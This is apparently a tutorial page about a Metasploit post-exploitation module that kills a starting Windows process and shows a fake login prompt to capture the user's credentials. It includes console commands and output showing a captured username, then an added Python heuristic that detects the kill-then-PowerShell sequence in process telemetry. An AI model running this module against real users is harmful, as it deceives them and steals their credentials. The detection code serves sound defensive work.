
Windows Gather User Credentials (phishing)

Description:

This module is able to perform a phishing attack on the target by popping up a loginprompt. When the user fills credentials in the loginprompt, the credentials will be sent to the attacker. The module is able to monitor for new processes and popup a loginprompt when a specific process is starting. Tested on Windows 7.

When notepad.exe is opened on the target machine, a login prompt window appears. If the user enters the right password, the notepad window appears; otherwise the prompt keeps coming back until you hate it.

msf post(phish_windows_credentials) > show options 

Module options (post/windows/gather/phish_windows_credentials):

   Name         Current Setting                                                                Required  Description
   ----         ---------------                                                                --------  -----------
   DESCRIPTION  {PROCESS_NAME} needs your permissions to start. Please enter user credentials  yes       Message shown in the loginprompt
   PROCESS                                                                                     no        Prompt if a specific process is started by the target. (e.g. calc.exe or specify * for all processes)
   SESSION                                                                                     yes       The session to run this module on.

msf post(phish_windows_credentials) > set SESSION 
SESSION => 
msf post(phish_windows_credentials) > set PROCESS notepad.exe
PROCESS => notepad.exe
msf post(phish_windows_credentials) > run

[+] PowerShell is installed.
[*] Monitoring new processes.
[*] notepad.exe is already running. Waiting on new instances to start
[*] notepad.exe is already running. Waiting on new instances to start
[*] notepad.exe is already running. Waiting on new instances to start
[*] New process detected:  notepad.exe
[*] Killing the process and starting the popup script. Waiting on the user to fill in his credentials...
[+] #< CLIXML

[+] 

[+] UserName                   Domain                     Password                 
--------                   ------                     --------                 
nfs                        nfs-                                             
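
The console output above shows a recognizable sequence: a new process is detected, killed almost immediately, and a PowerShell popup script starts. The following added example (not part of the original post or of the Metasploit module) flags that sequence in process create/terminate telemetry. The event schema, host names, PIDs, time windows, and the assumption that the popup runs in a new powershell.exe process are all constructed for illustration.

```python
# Added example: heuristic detection for the kill-then-prompt sequence.
# Event schema and thresholds are assumptions, not taken from the module.
from collections import defaultdict

KILL_WINDOW = 5.0     # seconds: process created, then terminated this quickly
PROMPT_WINDOW = 10.0  # seconds: PowerShell starts this soon after the kill

# Constructed sample telemetry (simplified process create/terminate records).
EVENTS = [
    {"t": 100.0, "host": "ws1", "type": "create", "pid": 4100, "image": "notepad.exe"},
    {"t": 100.8, "host": "ws1", "type": "terminate", "pid": 4100, "image": "notepad.exe"},
    {"t": 101.5, "host": "ws1", "type": "create", "pid": 4188, "image": "powershell.exe"},
    # Benign: long-lived notepad closed by the user, no PowerShell afterwards.
    {"t": 200.0, "host": "ws2", "type": "create", "pid": 5200, "image": "notepad.exe"},
    {"t": 260.0, "host": "ws2", "type": "terminate", "pid": 5200, "image": "notepad.exe"},
    # Benign: PowerShell started with no preceding quick kill.
    {"t": 300.0, "host": "ws2", "type": "create", "pid": 5300, "image": "powershell.exe"},
]

def find_kill_then_prompt(events):
    """Alert when a process dies right after starting and PowerShell then launches."""
    started = {}                      # (host, pid) -> creation event
    recent_kills = defaultdict(list)  # host -> [(kill_time, image, pid)]
    alerts = []
    for ev in sorted(events, key=lambda e: e["t"]):
        key = (ev["host"], ev["pid"])
        image = ev["image"].lower()
        if ev["type"] == "create":
            if image == "powershell.exe":
                # Correlate with any short-lived process killed just before.
                for kill_t, victim, vpid in recent_kills[ev["host"]]:
                    if 0 <= ev["t"] - kill_t <= PROMPT_WINDOW:
                        alerts.append({"host": ev["host"], "killed": victim,
                                       "killed_pid": vpid, "powershell_pid": ev["pid"],
                                       "delay": round(ev["t"] - kill_t, 2)})
            started[key] = ev
        elif ev["type"] == "terminate" and key in started:
            born = started.pop(key)
            # Only remember processes that lived for a very short time.
            if ev["t"] - born["t"] <= KILL_WINDOW:
                recent_kills[ev["host"]].append((ev["t"], image, ev["pid"]))
    return alerts

if __name__ == "__main__":
    for alert in find_kill_then_prompt(EVENTS):
        print(alert)
```

Both windows need tuning against real telemetry, since crashes and software updaters can also produce short-lived processes followed by PowerShell activity.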
           

[1].https://forsec.nl/2015/02/windows-credentials-phishing-using-metasploit/

[2].https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/phish_windows_credentials.rb

[3].https://github.com/rapid7/metasploit-framework/blob/master/data/post/powershell/Invoke-LoginPrompt.ps1